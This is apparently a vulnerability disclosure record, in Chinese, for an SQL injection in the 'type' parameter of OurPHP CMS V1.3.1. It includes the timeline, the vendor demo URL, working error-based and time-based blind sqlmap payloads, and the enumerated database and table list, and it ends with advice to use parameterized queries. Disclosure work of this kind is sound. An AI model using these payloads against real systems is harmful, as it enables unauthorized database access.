2015-08-19: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认，细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开
如题。
最新版本：V1.3.1，更新日期：2015-07-27。直接用官网 demo 复现：http://demo.ourphp.net/?cn-product-23.html=&type=a ，发现 type 参数存在 SQL 注入（详见下方 sqlmap 输出）。修复建议：对 type 参数做白名单校验，或在查询中使用参数化/预编译语句，而不是直接拼接到 SQL 中。
---Parameter: type (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cn-product-23.html=&type=a AND (SELECT 6513 FROM(SELECT COUNT(*),CONCAT(0x716b787871,(SELECT (ELT(6513=6513,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cn-product-23.html=&type=a AND (SELECT * FROM (SELECT(SLEEP(5)))RWCY)---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5.0current user: 'ourphp@localhost'current user is DBA: Falseavailable databases [2]:[*] information_schema[*] ourphpDatabase: ourphp[343 tables]+----------------------------------+| dz_baidusubmit_setting || dz_baidusubmit_sitemap || dz_baidusubmit_urlstat || dz_common_admincp_cmenu || dz_common_admincp_group || dz_common_admincp_member || dz_common_admincp_perm || dz_common_admincp_session || dz_common_admingroup || dz_common_adminnote || dz_common_advertisement || dz_common_advertisement_custom || dz_common_banned || dz_common_block || dz_common_block_favorite || dz_common_block_item || dz_common_block_item_data || dz_common_block_permission || dz_common_block_pic || dz_common_block_style || dz_common_block_xml || dz_common_cache || dz_common_card || dz_common_card_log || dz_common_card_type || dz_common_connect_guest || dz_common_credit_log || dz_common_credit_log_field || dz_common_credit_rule || dz_common_credit_rule_log || dz_common_credit_rule_log_field || dz_common_cron || dz_common_devicetoken || dz_common_district || dz_common_diy_data || dz_common_domain || dz_common_failedip || dz_common_failedlogin || dz_common_friendlink || dz_common_grouppm || dz_common_invite || dz_common_magic || dz_common_magiclog || dz_common_mailcron || dz_common_mailqueue || dz_common_member || dz_common_member_action_log || dz_common_member_connect || 
dz_common_member_count || dz_common_member_crime || dz_common_member_field_forum || dz_common_member_field_home || dz_common_member_forum_buylog || dz_common_member_grouppm || dz_common_member_log || dz_common_member_magic || dz_common_member_medal || dz_common_member_newprompt || dz_common_member_profile || dz_common_member_profile_setting || dz_common_member_security || dz_common_member_secwhite || dz_common_member_stat_field || dz_common_member_status || dz_common_member_validate || dz_common_member_verify || dz_common_member_verify_info || dz_common_member_wechat || dz_common_member_wechatmp || dz_common_myapp || dz_common_myinvite || dz_common_mytask || dz_common_nav || dz_common_onlinetime || dz_common_optimizer || dz_common_patch || dz_common_plugin || dz_common_pluginvar || dz_common_process || dz_common_regip || dz_common_relatedlink || dz_common_remote_port || dz_common_report || dz_common_searchindex || dz_common_seccheck || dz_common_secquestion || dz_common_session || dz_common_setting || dz_common_smiley || dz_common_sphinxcounter || dz_common_stat || dz_common_statuser || dz_common_style || dz_common_stylevar || dz_common_syscache || dz_common_tag || dz_common_tagitem || dz_common_task || dz_common_taskvar || dz_common_template || dz_common_template_block || dz_common_template_permission || dz_common_uin_black || dz_common_usergroup || dz_common_usergroup_field || dz_common_visit || dz_common_word || dz_common_word_type || dz_connect_disktask || dz_connect_feedlog || dz_connect_memberbindlog || dz_connect_postfeedlog || dz_connect_tthreadlog || dz_forum_access || dz_forum_activity || dz_forum_activityapply || dz_forum_announcement || dz_forum_attachment || dz_forum_attachment_0 || dz_forum_attachment_1 || dz_forum_attachment_2 || dz_forum_attachment_3 || dz_forum_attachment_4 || dz_forum_attachment_5 || dz_forum_attachment_6 || dz_forum_attachment_7 || dz_forum_attachment_8 || dz_forum_attachment_9 || dz_forum_attachment_exif || 
dz_forum_attachment_unused || dz_forum_attachtype || dz_forum_bbcode || dz_forum_collection || dz_forum_collectioncomment || dz_forum_collectionfollow || dz_forum_collectioninvite || dz_forum_collectionrelated || dz_forum_collectionteamworker || dz_forum_collectionthread || dz_forum_creditslog || dz_forum_debate || dz_forum_debatepost || dz_forum_faq || dz_forum_filter_post || dz_forum_forum || dz_forum_forum_threadtable || dz_forum_forumfield || dz_forum_forumrecommend || dz_forum_groupcreditslog || dz_forum_groupfield || dz_forum_groupinvite || dz_forum_grouplevel || dz_forum_groupuser || dz_forum_hotreply_member || dz_forum_hotreply_number || dz_forum_imagetype || dz_forum_medal || dz_forum_medallog || dz_forum_memberrecommend || dz_forum_moderator || dz_forum_modwork || dz_forum_newthread || dz_forum_onlinelist || dz_forum_optionvalue1 || dz_forum_order || dz_forum_poll || dz_forum_polloption || dz_forum_polloption_image || dz_forum_pollvoter || dz_forum_post || dz_forum_post_location || dz_forum_post_moderate || dz_forum_post_tableid || dz_forum_postcache || dz_forum_postcomment || dz_forum_postlog || dz_forum_poststick || dz_forum_promotion || dz_forum_ratelog || dz_forum_relatedthread || dz_forum_replycredit || dz_forum_rsscache || dz_forum_sofa || dz_forum_spacecache || dz_forum_statlog || dz_forum_thread || dz_forum_thread_moderate || dz_forum_threadaddviews || dz_forum_threadcalendar || dz_forum_threadclass || dz_forum_threadclosed || dz_forum_threaddisablepos || dz_forum_threadhidelog || dz_forum_threadhot || dz_forum_threadimage || dz_forum_threadlog || dz_forum_threadmod || dz_forum_threadpartake || dz_forum_threadpreview || dz_forum_threadprofile || dz_forum_threadprofile_group || dz_forum_threadrush || dz_forum_threadtype || dz_forum_trade || dz_forum_tradecomment || dz_forum_tradelog || dz_forum_typeoption || dz_forum_typeoptionvar || dz_forum_typevar || dz_forum_warning || dz_home_album || dz_home_album_category || dz_home_appcreditlog || 
dz_home_blacklist || dz_home_blog || dz_home_blog_category || dz_home_blog_moderate || dz_home_blogfield || dz_home_class || dz_home_click || dz_home_clickuser || dz_home_comment || dz_home_comment_moderate || dz_home_docomment || dz_home_doing || dz_home_doing_moderate || dz_home_favorite || dz_home_feed || dz_home_feed_app || dz_home_follow || dz_home_follow_feed || dz_home_follow_feed_archiver || dz_home_friend || dz_home_friend_request || dz_home_friendlog || dz_home_notification || dz_home_pic || dz_home_pic_moderate || dz_home_picfield || dz_home_poke || dz_home_pokearchive || dz_home_share || dz_home_share_moderate || dz_home_show || dz_home_specialuser || dz_home_userapp || dz_home_userappfield || dz_home_visitor || dz_mobile_setting || dz_mobile_wechat_authcode || dz_mobile_wechat_masssend || dz_mobile_wechat_resource || dz_mobile_wsq_threadlist || dz_portal_article_content || dz_portal_article_count || dz_portal_article_moderate || dz_portal_article_related || dz_portal_article_title || dz_portal_article_trash || dz_portal_attachment || dz_portal_category || dz_portal_category_permission || dz_portal_comment || dz_portal_comment_moderate || dz_portal_rsscache || dz_portal_topic || dz_portal_topic_pic || dz_security_evilpost || dz_security_eviluser || dz_security_failedlog || dz_ucenter_admins || dz_ucenter_applications || dz_ucenter_badwords || dz_ucenter_domains || dz_ucenter_failedlogins || dz_ucenter_feeds || dz_ucenter_friends || dz_ucenter_mailqueue || dz_ucenter_memberfields || dz_ucenter_members || dz_ucenter_mergemembers || dz_ucenter_newpm || dz_ucenter_notelist || dz_ucenter_pm_indexes || dz_ucenter_pm_lists || dz_ucenter_pm_members || dz_ucenter_pm_messages_0 || dz_ucenter_pm_messages_1 || dz_ucenter_pm_messages_2 || dz_ucenter_pm_messages_3 || dz_ucenter_pm_messages_4 || dz_ucenter_pm_messages_5 || dz_ucenter_pm_messages_6 || dz_ucenter_pm_messages_7 || dz_ucenter_pm_messages_8 || dz_ucenter_pm_messages_9 || dz_ucenter_protectedmembers || 
dz_ucenter_settings || dz_ucenter_sqlcache || dz_ucenter_tags || dz_ucenter_vars || opcms_user || opcms_web || ourphp_ad || ourphp_admin || ourphp_adminclick || ourphp_api || ourphp_article || ourphp_banner || ourphp_book || ourphp_booksection || ourphp_column || ourphp_comment || ourphp_down || ourphp_freight || ourphp_integral || ourphp_job || ourphp_lang || ourphp_link || ourphp_mail || ourphp_orders || ourphp_photo || ourphp_plus || ourphp_product || ourphp_productattribute || ourphp_productcp || ourphp_productset || ourphp_productspecifications || ourphp_qq || ourphp_search || ourphp_shoppingcart || ourphp_temp || ourphp_user || ourphp_usercontrol || ourphp_userleve || ourphp_usermessage || ourphp_userpay || ourphp_userproblem || ourphp_video || ourphp_wap || ourphp_watermark || ourphp_web || ourphp_webdeploy |+----------------------------------+
危害等级:中
漏洞Rank:5
确认时间:2015-08-19 11:22
谢谢，请尽快修复。
暂无